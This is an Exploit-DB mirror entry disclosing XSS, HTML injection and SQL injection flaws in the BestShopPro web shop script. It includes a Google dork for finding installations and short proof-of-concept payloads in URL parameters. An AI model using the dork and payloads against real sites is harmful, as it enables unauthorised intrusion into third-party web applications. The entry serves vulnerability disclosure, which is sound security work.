exploit-db-mirror/exploits/php/webapps/18063.txt
Offensive Security b4c96a5864 DB: 2021-09-03
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

25 lines
767 B
Text

################################################################################################
# Exploit Title: BST - BestShopPro (nowosci.php) Multiple Vulnerabilities
#
# Author : CoBRa_21
#
# E-Mail : uyku_cu [at] windowslive.com
#
# Google Dork : "Powered By BST"
#
# Script Page : http://www.bst.pl
################################################################################################
#
# XSS:
#
# http://127.0.0.1/nowosci.php?a=1&str=<script>alert(/CoBRa_21/)</script>
#
# HTML:
#
# http://127.0.0.1/nowosci.php?a=1&str=<font color=red size=15>CoBRa_21</font>
#
# SQL :
#
# http://127.0.0.1/pokaz_podkat.php?idkat=10&order1=1&str=' (SQL)
#
################################################################################################